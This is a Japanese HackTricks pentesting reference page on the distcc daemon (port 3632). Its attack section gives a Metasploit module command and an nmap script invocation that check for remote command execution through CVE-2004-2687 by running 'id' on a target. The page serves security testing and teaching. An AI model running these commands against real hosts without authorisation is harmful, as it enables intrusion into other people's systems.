hacktricks/network-services-pentesting/3632-pentesting-distcc.md

ゼロからヒーローまでAWSハッキングを学ぶ htARTE（HackTricks AWS Red Team Expert）！

HackTricks をサポートする他の方法:

• HackTricks で企業を宣伝したいまたは HackTricks をPDFでダウンロードしたい場合は、SUBSCRIPTION PLANSをチェックしてください！
• 公式PEASS＆HackTricksスウォッグを入手する
• The PEASS Familyを発見し、独占的なNFTsコレクションを見つける
• 💬 Discordグループまたはtelegramグループに参加するか、Twitter 🐦 @carlospolopmをフォローする
• ハッキングトリックを共有するには、PRを HackTricks および HackTricks Cloud のGitHubリポジトリに提出してください。

基本情報

Distcc は、ネットワーク内の他のコンピュータのアイドル処理能力を利用して、コンパイルプロセスを強化するツールです。distcc がマシンに設定されると、このマシンはコンパイルタスクを別のシステムに分散することができます。受信システムはdistccdデーモンを実行しており、送信されたコードを処理するために互換性のあるコンパイラをインストールしている必要があります。

デフォルトポート: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

攻撃

CVE-2004-2687 に対して脆弱性があるかどうかをチェックして、任意のコードを実行できるかどうかを確認します：

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"

Shodan

このサービスはShodanが検出するとは思いません。

リソース

• https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec
• https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855

Álex B (@r1p) によって作成された投稿

ゼロからヒーローまでのAWSハッキングを学ぶ htARTE (HackTricks AWS Red Team Expert)!

HackTricks をサポートする他の方法:

• HackTricks で企業を宣伝したい または HackTricks をPDFでダウンロードしたい 場合は SUBSCRIPTION PLANS をチェックしてください！
• 公式PEASS＆HackTricksのグッズを入手する
• The PEASS Family を発見し、独占的な NFTs のコレクションを見つける
• 💬 Discordグループ または telegramグループ に参加するか、Twitter 🐦 @carlospolopm をフォローする。**
• HackTricks と HackTricks Cloud のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有する。